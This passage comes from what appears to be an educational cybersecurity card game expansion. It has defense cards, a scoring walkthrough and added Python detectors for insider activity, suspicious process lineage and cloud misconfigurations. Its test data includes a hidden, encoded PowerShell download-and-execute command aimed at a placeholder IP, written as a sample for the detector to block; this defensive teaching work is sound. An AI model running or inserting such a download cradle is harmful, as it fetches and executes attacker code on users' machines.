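    z = (ev["bytes"] - baseline.mean_bytes) / baseline.std_bytes
    if z > z_threshold:
        indicators.append("volume_outlier")
    # One odd signal is routine (on-call work, a maintenance window); two or
    # more together are the pattern on the threat card and deserve an analyst.
    return {"user": ev["user"], "indicators": indicators, "z": round(z, 1), "alert": len(indicators) >= 2}


BUSINESS_HOURS = list(range(9, 18))


def build_history():
    """Constructed four-week history for an IT operations account (Feb 2024)."""
    rng = random.Random(3)
    start = datetime(2024, 2, 1)
    history = []
    for day in range(28):
        d = start + timedelta(days=day)
        if d.weekday() >= 5:            # no weekend work in the baseline
            continue
        for k in range(3):              # three reads a day, spread over business hours
            hour = BUSINESS_HOURS[(day + 3 * k) % len(BUSINESS_HOURS)]
            history.append({"user": "itops1", "resource": rng.choice(["ticketing-db", "inventory-db"]),
                            "time": d.replace(hour=hour, minute=rng.randint(0, 59)),
                            "bytes": rng.randint(10_000_000, 25_000_000)})
    for day in (4, 18):                 # two approved 02:00 maintenance windows: rare, so 02:00 stays off-hours
        d = start + timedelta(days=day)
        history.append({"user": "itops1", "resource": "inventory-db", "time": d.replace(hour=2), "bytes": 5_000_000})
    return history


NEW_EVENTS = [   # constructed: the card's clue, a night-shift ticket lookup, an ordinary afternoon read
    {"user": "itops1", "resource": "hr-payroll-db", "time": datetime(2024, 3, 1, 2, 10), "bytes": 4_000_000_000},
    {"user": "itops1", "resource": "ticketing-db", "time": datetime(2024, 3, 1, 2, 30), "bytes": 30_000_000},
    {"user": "itops1", "resource": "inventory-db", "time": datetime(2024, 2, 29, 14, 0), "bytes": 40_000_000},
]

if __name__ == "__main__":
    baseline = build_baselines(build_history())["itops1"]
    for ev in NEW_EVENTS:
        print(score(ev, baseline))
```

The 02:30 ticket lookup trips only the off-hours indicator and stays quiet; the 02:10 multi-gigabyte read of a payroll database the account has never touched trips all three. Requiring two indicators is what keeps a behavioral system usable: the card's "very high" detection difficulty comes from insiders whose activity trips none, not from false positives.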
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PROCESS BEHAVIOR ANALYSIS │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy process-level behavioral │
│ monitoring that learns what each │
│ application normally does (file I/O,│
│ network calls, registry access, │
│ child processes spawned). Blocks │
│ anomalous behavior from legitimate │
│ binaries. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Catches: │
│ - Legitimate apps compromised by │
│ supply chain attack │
│ - Process injection attacks │
│ - Unexpected child process creation │
│ - Anomalous registry/file writes │
│ Example: Word.exe normally doesn't │
│ spawn PowerShell; if it does, block │
│ and alert. │
│ │
│ DETECTS: Zero-day malware, APT │
│ techniques, supply chain compromises.│
└─────────────────────────────────────┘
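The "Word.exe normally doesn't spawn PowerShell" check from the card, as an added example that is not part of the RetroVerse materials: a Python model that learns parent/child process pairs from a clean training window, then grades new process-creation events (Sysmon Event ID 1 style) on lineage and on an encoded PowerShell command line. The training events, the new events and the encoded payload are constructed for the example; the `-e`/`-enc`/`-EncodedCommand` decoding is real PowerShell behaviour (UTF-16LE wrapped in Base64).

```python
import base64
import re
from collections import Counter

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


class ProcessBaseline:
    """Counts (parent, child) pairs seen during a clean training window."""

    def __init__(self):
        self.pairs = Counter()

    def learn(self, events):
        for ev in events:
            self.pairs[(basename(ev["parent"]), basename(ev["image"]))] += 1

    def known(self, parent: str, child: str) -> bool:
        return self.pairs[(parent, child)] > 0


def decode_encoded_powershell(cmdline: str):
    """Return the script text if the command line carries -e/-enc/-EncodedCommand, else None."""
    m = re.search(r"(?i)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(ev, baseline: ProcessBaseline):
    parent, child = basename(ev["parent"]), basename(ev["image"])
    reasons = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append("office_app_spawned_script_host")
    decoded = decode_encoded_powershell(ev.get("cmdline", ""))
    if decoded is not None:
        reasons.append("encoded_powershell:" + decoded[:40])
    if not baseline.known(parent, child):
        reasons.append("unseen_parent_child")
    if any(r.startswith(("office_app", "encoded_")) for r in reasons):
        verdict = "block"          # high-confidence tradecraft: stop the child process
    elif reasons:
        verdict = "alert"          # new lineage: worth an analyst look, not an automatic block
    else:
        verdict = "allow"
    return {"verdict": verdict, "parent": parent, "child": child, "reasons": reasons}


# Constructed paths used in both the training window and the new events.
EXPLORER = r"C:\Windows\explorer.exe"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SPLWOW64 = r"C:\Windows\splwow64.exe"
SERVICES = r"C:\Windows\System32\services.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUNDLL32 = r"C:\Windows\System32\rundll32.exe"

TRAINING = [   # what a clean week looks like (constructed)
    {"parent": EXPLORER, "image": WINWORD},
    {"parent": WINWORD, "image": SPLWOW64},      # Word printing through the 32-bit spooler helper
    {"parent": EXPLORER, "image": CHROME},
    {"parent": CHROME, "image": CHROME},
    {"parent": SERVICES, "image": SVCHOST},
]

PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"   # constructed
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

NEW_EVENTS = [
    {"parent": WINWORD, "image": POWERSHELL, "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"parent": EXPLORER, "image": CHROME, "cmdline": "chrome.exe"},
    {"parent": SVCHOST, "image": RUNDLL32, "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"parent": WINWORD, "image": SPLWOW64, "cmdline": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    baseline = ProcessBaseline()
    baseline.learn(TRAINING)
    for ev in NEW_EVENTS:
        print(assess(ev, baseline))
```

Decoding the command line matters because the lineage rule alone would also fire on a legitimate macro-driven workflow; seeing a download cradle in the decoded text is what justifies blocking instead of alerting. The svchost to rundll32 case shows the other half of the design: unseen lineage on its own is an alert, since plenty of benign Windows activity looks like that.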
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ MACHINE LEARNING ANOMALY DETECTION │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy ML models trained on large │
│ historical security datasets. They │
│ surface anomalies rule-based systems│
│ miss: timing shifts, rare resource │
│ combinations, statistical outliers. │
│ Retrain continuously to track drift.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Catches advanced attacks that bypass│
│ signature and rule-based systems. │
│ Detects: │
│ - Polymorphic malware variations │
│ - Advanced persistent threats (APT) │
│ - Zero-day exploits (by behavior) │
│ - Sophisticated insider threats │
│ - Supply chain compromises │
│ │
│ TRADE-OFF: False positives require │
│ human analysis. Requires large │
│ datasets for training. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CONTAINER IMAGE SCANNING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Scan all container images before │
│ deployment for known vulnerabilities│
│ and malicious packages. Integrate │
│ scanning into CI/CD pipeline. │
│ Block images with critical CVEs │
│ from being deployed. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents deployment of vulnerable │
│ containers. Catches: │
│ - Old base images with known CVEs │
│ - Malicious packages in dependencies│
│ - Secrets accidentally baked into │
│ images │
│ Works best when combined with │
│ runtime monitoring. │
│ │
│ LIMITATION: Only catches known │
│ vulnerabilities (CVE databases), and│
│ only as of scan time; re-scan images│
│ already deployed as new CVEs land. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CONTAINER RUNTIME PROTECTION │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy runtime security monitoring │
│ that enforces security policies on │
│ running containers. Monitor syscalls│
│ (system calls), network connections,│
│ and file access. Enforce AppArmor │
│ or SELinux profiles. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects and blocks: │
│ - Container escape attempts │
│ - Lateral movement between containers│
│ - Privilege escalation in container │
│ - Anomalous process execution │
│ - Unexpected network connections │
│ Works against both known and unknown│
│ attacks (zero-day exploits). │
│ │
│ REQUIREMENT: Requires kernel-level │
│ instrumentation; varies by platform.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ KUBERNETES NETWORK POLICY & RBAC │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement Kubernetes network policies│
│ to restrict container-to-container │
│ communication. Deploy role-based │
│ access control (RBAC) for API access│
│ and service accounts. Enforce Pod │
│ Security Standards via admission │
│ control (Pod Security Admission │
│ replaced PodSecurityPolicy in 1.25).│
├─────────────────────────────────────┤
│ EFFECT: │
│ Implements micro-segmentation in │
│ containerized environments. Prevents:│
│ - Lateral movement between pods │
│ - Container escape attacks accessing │
│ host network │
│ - Privilege escalation via RBAC │
│ - Unauthorized Kubernetes API access│
│ │
│ COMPLEXITY: Requires mature │
│ Kubernetes operations and expertise. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CLOUD CONFIGURATION AUDITING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy continuous cloud configuration│
│ monitoring (AWS Config, Azure │
│ Policy, GCP Cloud Asset Inventory). │
│ Scan for misconfigured resources: │
│ - Public S3 buckets │
│ - Overly permissive IAM policies │
│ - Unencrypted databases │
│ - Open security groups │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects misconfigurations that allow│
│ unauthorized access: │
│ - Public database access │
│ - Exposed credentials in configs │
│ - Overly broad IAM permissions │
│ - Disabled encryption/logging │
│ Alert on drift from secure baseline.│
│ │
│ LIMITATION: Only catches known │
│ misconfiguration patterns. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CLOUD ACCESS & PERMISSION AUDITING │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Audit all IAM roles, service │
│ accounts, and API credentials for │
│ over-privilege. Implement least- │
│ privilege access. Regularly review │
│ who has what permissions. Detect │
│ and revoke unused credentials. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents attackers from leveraging: │
│ - Exposed API keys with broad │
│ permissions │
│ - Service accounts with admin access│
│ - Stale credentials from departed │
│ employees │
│ - Cross-account trust abuse │
│ Reduces blast radius if credentials │
│ are compromised. │
│ │
│ REQUIRES: Strong governance process │
│ to maintain least-privilege state. │
└─────────────────────────────────────┘
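The checks the two cloud auditing cards above describe (D-34's misconfiguration scan and D-35's over-privilege and stale-credential review), as one added example that is not part of the RetroVerse materials: a Python audit over an inventory of IAM policy documents, S3 bucket settings and credential-report rows. The inventory, the account ID, the bucket names and the key ages are constructed for the example; in practice the same data comes from `aws iam get-policy-version`, `get-public-access-block`/`get-bucket-policy` and the IAM credential report.

```python
from datetime import datetime, timezone


def _as_list(value):
    """IAM JSON allows a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def audit_iam_policy(name, document):
    findings = []
    for idx, st in enumerate(_as_list(document.get("Statement", []))):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action", []))
        resources = _as_list(st.get("Resource", []))
        if "NotAction" in st:
            findings.append(f"{name}#{idx}: NotAction grants everything not listed, review")
        if any(a == "*" or a.endswith(":*") for a in actions) and "*" in resources:
            findings.append(f"{name}#{idx}: {actions} on all resources, scope down")
    return findings


def audit_bucket(name, cfg):
    findings = []
    pab = cfg.get("PublicAccessBlock", {})
    if not all(pab.get(k) for k in ("BlockPublicAcls", "IgnorePublicAcls",
                                    "BlockPublicPolicy", "RestrictPublicBuckets")):
        findings.append(f"{name}: public access block not fully enabled")
    for st in _as_list(cfg.get("Policy", {}).get("Statement", [])):
        principal = st.get("Principal")
        anyone = principal == "*" or (isinstance(principal, dict)
                                      and "*" in _as_list(principal.get("AWS", [])))
        if st.get("Effect") == "Allow" and anyone and not st.get("Condition"):
            findings.append(f"{name}: policy grants {_as_list(st.get('Action'))} to everyone")
    if not cfg.get("DefaultEncryption"):
        findings.append(f"{name}: default encryption disabled")
    return findings


def audit_access_keys(rows, now, max_age_days=90):
    """Rows mimic the IAM credential report: one access key per row."""
    findings = []
    for row in rows:
        age = (now - datetime.fromisoformat(row["created"])).days
        idle = (now - datetime.fromisoformat(row["last_used"])).days if row["last_used"] else age
        tag = f"{row['user']}/{row['key']}"
        if not row["user_active"]:
            findings.append(f"{tag}: live key on a disabled/departed user, revoke now")
        elif idle > max_age_days:
            findings.append(f"{tag}: unused for {idle} days, revoke")
        elif age > max_age_days:
            findings.append(f"{tag}: {age} days old, rotate")
    return findings


def run_audit(inventory, now):
    report = {"iam": [], "s3": [], "keys": []}
    for name, doc in inventory["policies"].items():
        report["iam"] += audit_iam_policy(name, doc)
    for name, cfg in inventory["buckets"].items():
        report["s3"] += audit_bucket(name, cfg)
    report["keys"] = audit_access_keys(inventory["access_keys"], now)
    return report


NOW = datetime(2024, 3, 1, tzinfo=timezone.utc)
_PAB_ON = {k: True for k in ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")}
_PAB_OFF = {k: False for k in _PAB_ON}
INVENTORY = {   # constructed snapshot of one account
    "policies": {
        "DeveloperPower": {"Statement": [{"Effect": "Allow", "Action": ["s3:*", "ec2:*"], "Resource": "*"}]},
        "LogReader": {"Statement": [{"Effect": "Allow", "Action": ["logs:GetLogEvents", "logs:FilterLogEvents"],
                                     "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/app/*"}]},
        "BreakGlass": {"Statement": [{"Effect": "Allow", "NotAction": "iam:*", "Resource": "*"}]},
    },
    "buckets": {
        "customer-exports": {"PublicAccessBlock": _PAB_OFF, "DefaultEncryption": False,
                             "Policy": {"Statement": [{"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
                                                       "Resource": "arn:aws:s3:::customer-exports/*"}]}},
        "app-logs": {"PublicAccessBlock": _PAB_ON, "DefaultEncryption": True,
                     "Policy": {"Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/LogWriter"},
                                               "Action": "s3:PutObject", "Resource": "arn:aws:s3:::app-logs/*"}]}},
    },
    "access_keys": [   # key IDs are AWS documentation placeholders / constructed
        {"user": "jdoe", "key": "AKIAIOSFODNN7EXAMPLE", "created": "2023-01-15T00:00:00+00:00", "last_used": "2024-02-28T00:00:00+00:00", "user_active": False},
        {"user": "asmith", "key": "AKIAI44QH8DHBEXAMPLE", "created": "2023-08-01T00:00:00+00:00", "last_used": "2024-02-29T00:00:00+00:00", "user_active": True},
        {"user": "bkim", "key": "AKIAEXAMPLEBKIM00001", "created": "2023-11-01T00:00:00+00:00", "last_used": None, "user_active": True},
        {"user": "clee", "key": "AKIAEXAMPLECLEE00001", "created": "2024-02-01T00:00:00+00:00", "last_used": "2024-02-29T00:00:00+00:00", "user_active": True},
    ],
}

if __name__ == "__main__":
    for section, items in run_audit(INVENTORY, NOW).items():
        print(section, *items, sep="\n  ")
```

The `jdoe` row is the CLOUD API TOKEN THEFT scenario before it happens: a key that was still active weeks after the user was disabled. The key audit orders its checks so that the departed-user case wins over the age and idle checks, because the remediation differs (revoke immediately rather than schedule a rotation).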
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ CLOUD COMPLIANCE & AUDIT TRAIL │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Enable comprehensive cloud audit │
│ logging (AWS CloudTrail, Google │
│ Cloud Audit Logs, Azure Activity │
│ Log). Forward all logs to immutable,│
│ centralized storage. Monitor for │
│ unauthorized API calls, data access,│
│ and resource changes. Protect the │
│ log bucket with Object Lock or MFA │
│ Delete so intruders cannot purge it.│
├─────────────────────────────────────┤
│ EFFECT: │
│ Provides forensic trail for: │
│ - Detecting API token abuse │
│ - Investigating data exfiltration │
│ - Compliance reporting │
│ - Incident response timeline │
│ Prevents attackers from covering │
│ tracks (immutable logs). Enables │
│ rapid investigation of cloud API │
│ compromises. │
│ │
│ COST: High storage requirements. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: RANSOMWARE RESPONSE │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Pre-built, tested ransomware response│
│ playbook covering: │
│ - Immediate network isolation steps │
│ - Communication procedures │
│ - Forensic data collection │
│ - Restoration procedures │
│ - Stakeholder notifications │
│ Train incident response team on │
│ playbook annually. │
├─────────────────────────────────────┤
│ EFFECT: │
│ During Phase 2 or when ransomware │
│ is detected: │
│ Get +4 bonus to defense rolls when │
│ responding to ransomware threats. │
│ Reduces response time, limiting │
│ damage. │
│ │
│ EDUCATIONAL VALUE: Teaches incident │
│ response process and coordination. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: CREDENTIAL COMPROMISE │
│ RESPONSE │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Pre-built playbook for credential │
│ compromise scenarios: │
│ - Identify affected accounts │
│ - Forced password reset procedures │
│ - Session invalidation │
│ - MFA re-enrollment process │
│ - Forensic user activity review │
│ - Privileged account audit │
├─────────────────────────────────────┤
│ EFFECT: │
│ When investigating compromised │
│ credentials: │
│ Get +4 bonus to defense rolls. │
│ Allows rapid containment before │
│ lateral movement occurs. │
│ │
│ EXAMPLE USE: During "Mimikatz │
│ Credential Dumping" threat, playbook│
│ helps isolate affected accounts. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: INSIDER THREAT RESPONSE │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Comprehensive insider threat │
│ response playbook including: │
│ - HR coordination protocols │
│ - Legal review and preservation │
│ - Forensic evidence collection │
│ - Physical security response │
│ - System access removal procedures │
│ - Communication to management │
│ Requires cross-functional team │
│ coordination. │
├─────────────────────────────────────┤
│ EFFECT: │
│ When responding to insider threats: │
│ Get +5 bonus to defense rolls. │
│ Requires strong organizational │
│ processes to be effective. │
│ │
│ EXAMPLE USE: When "Malicious │
│ Insider Data Theft" is detected, │
│ playbook coordinates response across │
│ security, HR, legal, and executives.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PLAYBOOK: SUPPLY CHAIN BREACH │
│ RESPONSE │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Specialized playbook for supply │
│ chain compromises: │
│ - Vendor notification procedures │
│ - Industry coordination │
│ - Affected system inventory │
│ - Patch deployment prioritization │
│ - Third-party impact assessment │
│ - Public communication strategy │
├─────────────────────────────────────┤
│ EFFECT: │
│ During Phase 2 when defending │
│ against supply chain attacks: │
│ Get +5 bonus to defense rolls. │
│ Requires vendor relationships and │
│ industry collaboration. │
│ │
│ LEARNING: Teaches that supply chain │
│ incidents require industry response.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BACKUP STRATEGY - 3-2-1 RULE │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement the 3-2-1 backup rule: │
│ - 3 copies of data │
│ - 2 different media types │
│ - 1 copy offline/offsite │
│ Regular backup verification testing.│
│ Document retention and recovery RPO/│
│ RTO (Recovery Point/Time Objectives).│
├─────────────────────────────────────┤
│ EFFECT: │
│ If ransomware encrypts data: │
│ Recovery becomes possible without │
│ paying ransom. Offline backups │
│ ensure attacker cannot delete them. │
│ Reduces ransomware attack impact │
│ significantly. │
│ │
│ LIMITATION: Only effective if │
│ backups are regularly tested and │
│ truly offline. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ IMMUTABLE BACKUP STORAGE │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy backup storage with WORM │
│ (Write-Once-Read-Many) protection. │
│ Once backups are written, they │
│ cannot be modified or deleted, │
│ even by administrators. Implement │
│ MFA Delete on storage. Use air-gapped│
│ backup network. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Even if attacker gains admin access │
│ or compromises backup system: │
│ Backups remain intact, so recovery │
│ is possible without paying for a │
│ decryptor. This defeats only the │
│ encryption half of double-extortion │
│ ransomware; it does nothing about │
│ data that was already stolen. │
│ │
│ COST: Higher storage cost for │
│ immutable solutions. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ DISASTER RECOVERY PLAN & TESTING │
│ (ELITE - 25 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Establish comprehensive disaster │
│ recovery plan (DRP) including: │
│ - Failover procedures │
│ - Alternate site readiness │
│ - Recovery procedures (step-by-step)│
│ - Communication protocols │
│ - Key personnel contacts │
│ Conduct quarterly DRP drills and │
│ recovery testing. │
├─────────────────────────────────────┤
│ EFFECT: │
│ During ransomware or supply chain │
│ attacks: │
│ Get +3 bonus to all defense rolls │
│ after initial containment. Enables │
│ business continuity. │
│ │
│ EDUCATIONAL VALUE: Teaches business │
│ continuity planning and resilience. │
└─────────────────────────────────────┘
Against Supply Chain Attacks (T-13, T-14):
- D-31: Container Image Scanning
- D-29: Process Behavior Analysis (catches apps compromised by supply chain attacks)
- D-40: Playbook: Supply Chain Breach Response

Against Insider Threats (T-15, T-16):
- D-28: Baseline Behavior Learning System
- D-29: Process Behavior Analysis
- D-39: Playbook: Insider Threat Response

Against IoT Compromise (T-17):
- D-25: Application Whitelisting
- D-31: Container Image Scanning (if containerized)
- D-28: Baseline Behavior Learning System

Against Cloud API Abuse (T-18):
- D-34: Cloud Configuration Auditing
- D-35: Cloud Access & Permission Auditing
- D-36: Cloud Compliance & Audit Trail

Against DNS Tunneling (T-19):
- D-28: Baseline Behavior Learning System (network baseline)
- D-30: Machine Learning Anomaly Detection

Against Physical Security Bypass (T-20):
- D-28: Baseline Behavior Learning System (detection)
- D-38: Playbook: Credential Compromise Response

Against Ransomware (T-11, supply chain variants):
- D-41: Backup Strategy - 3-2-1 Rule
- D-42: Immutable Backup Storage
- D-43: Disaster Recovery Plan & Testing
- D-37: Playbook: Ransomware Response
Starting Budget: 150 | Turn Limit: 7 (one action per turn; up to 2 BASIC defenses may be deployed as one action)
- Turn 1 (Foundation): D-34 Cloud Configuration Auditing (10) + D-25 Application Whitelisting (10) — Quick-Win pair → 20 spent
- Turn 2 (Foundation): D-41 Backup Strategy - 3-2-1 Rule (10) + D-31 Container Image Scanning (10) — Quick-Win pair → 40 spent
- Turn 3 (Advanced Layer): D-28 Baseline Behavior Learning System (15) → 55 spent
- Turn 4 (Advanced Layer): D-32 Container Runtime Protection (15) → 70 spent
- Turn 5 (Advanced Layer): D-35 Cloud Access & Permission Auditing (15) → 85 spent
- Turn 6 (Preparation): Create MALWARE playbook (10) → 95 spent
- Turn 7 (Expert Layer): D-36 Cloud Compliance & Audit Trail (25) → 120 spent, 30 remaining

Final Security Score Calculation (v2.2 formula):
- (8 defenses deployed × 5) = 40 points
- (0 hardening upgrades × 2) = 0 points
- (1 playbook × 10) = 10 points
- (3 of 4 pentester tactics defended × 5) = 15 points
- Budget efficiency: (30 / 150) × 10 = 2 points
- Total: 67 points (Strong defense-in-depth — Victory: score ≥ 60, ≥ 4 defenses, majority of tactics defended)
When a Pentester Tactic Card (PT-01 to PT-08, see ../../hardening/core-deck/pentester-tactic-cards.md) is drawn during a Hardening phase, these expansion defenses may be chosen as the single resolving defense. Use the bonus below as the chosen defense's printed bonus in the canonical formula (d20 + printed bonus + upgrades + playbook vs. the tactic's DC):
Why it matters:
- Stops 90%+ of malware variants if properly configured
- "Defense in depth" - cheap to start, expensive to perfect
- Trade-off: Security vs. usability (users can't run unauthorized apps)

Real-world context:
- Used by government agencies and financial institutions
- Apple's approach (iOS/macOS sandboxing)
- Increasingly common in "zero trust" architectures

Discussion points:
- "What does a living-off-the-land blocker stop that regular whitelisting doesn't?"
- "Why is adoption slow despite effectiveness?"

Why it matters:
- Catches attacks that don't match known signatures
- Foundation for modern threat detection
- Requires a "normal" baseline to be effective

Real-world context:
- Splunk, Elastic, Sentinel use behavioral analytics
- UEBA systems detect insider threats
- Process behavior monitoring by CrowdStrike Falcon, Tanium

Discussion points:
- "What counts as 'abnormal' and who decides?"
- "How do you build a baseline without including attacks?"
- "Why can't signature-based antivirus do this?"

Why it matters:
- Container environments have unique attack surfaces
- Rapid deployment means traditional approaches fail
- Network segmentation at container level is powerful

Real-world context:
- Kubernetes is now the standard container orchestrator
- Docker/container adoption is 90%+ in enterprises
- Container escape vulnerabilities (runc, containerd, etc.)

Discussion points:
- "How is container security different from VM security?"
- "Why is network policy critical in Kubernetes?"
- "What's an example of a container escape attack?"

Why it matters:
- Cloud misconfigurations are a leading breach cause
- Shared responsibility model confuses organizations
- API-driven access requires different monitoring

Real-world context:
- Hundreds of millions exposed via public S3 buckets
- Capital One breach: misconfigured WAF
- Equifax: unpatched open-source component in cloud environment

Discussion points:
- "Who's responsible for cloud security: vendor or organization?"
- "How do you audit permissions when there are 1000s of IAM roles?"
- "Why is 'least privilege' hard to achieve in practice?"

Why it matters:
- Pre-planning reduces response time significantly
- Coordination across teams is critical
- Written procedures prevent panic decisions

Real-world context:
- Organizations without playbooks average 9+ month detection times
- With playbooks, the average drops to 3-4 months
- Playbooks required by HIPAA, PCI-DSS, NIST frameworks

Discussion points:
- "Who should be involved in ransomware response?"
- "How do you balance forensics with business recovery?"
- "Why test playbooks if you hope to never use them?"

Why it matters:
- Ransomware made backups critical (not just compliance)
- Recovery is often the cheapest way to respond to attacks
- Immutable backups prevent attacker deletion

Real-world context:
- Many ransomware attacks double-extort (steal + encrypt)
- Immutable backups became critical after backup deletion attacks
- AWS S3, Azure Blob WORM protection adopted widely

Discussion points:
- "Can backups be targeted by attackers?"
- "What's the difference between backup and disaster recovery?"
- "Why would immutable backups be controversial?"
| Card | Title | Tier | Budget | Countermeasure |
|---|---|---|---|---|
| D-25 | Application Whitelisting | BASIC | 10 | MALWARE |
| D-26 | Advanced Application Control with AI | ADVANCED | 15 | MALWARE |
| D-27 | Living-Off-The-Land Blocker | ELITE | 25 | MALWARE |
| D-28 | Baseline Behavior Learning System | ADVANCED | 15 | NETWORK |
| D-29 | Process Behavior Analysis | ADVANCED | 15 | MALWARE |
| D-30 | Machine Learning Anomaly Detection | ELITE | 25 | MALWARE |
| D-31 | Container Image Scanning | BASIC | 10 | MALWARE |
| D-32 | Container Runtime Protection | ADVANCED | 15 | MALWARE |
| D-33 | Kubernetes Network Policy & RBAC | ELITE | 25 | NETWORK |
| D-34 | Cloud Configuration Auditing | BASIC | 10 | CREDENTIAL ABUSE |
| D-35 | Cloud Access & Permission Auditing | ADVANCED | 15 | CREDENTIAL ABUSE |
| D-36 | Cloud Compliance & Audit Trail | ELITE | 25 | DATA EXFIL |
| D-37 | Playbook: Ransomware Response | ADVANCED | 15 | MALWARE |
| D-38 | Playbook: Credential Compromise Response | ADVANCED | 15 | CREDENTIAL ABUSE |
| D-39 | Playbook: Insider Threat Response | ELITE | 25 | DATA EXFIL |
| D-40 | Playbook: Supply Chain Breach Response | ELITE | 25 | WEB EXPLOIT |
| D-41 | Backup Strategy - 3-2-1 Rule | BASIC | 10 | MALWARE |
| D-42 | Immutable Backup Storage | ADVANCED | 15 | MALWARE |
| D-43 | Disaster Recovery Plan & Testing | ELITE | 25 | MALWARE |
Total Expansion Cards: 19 (D-25 to D-43)
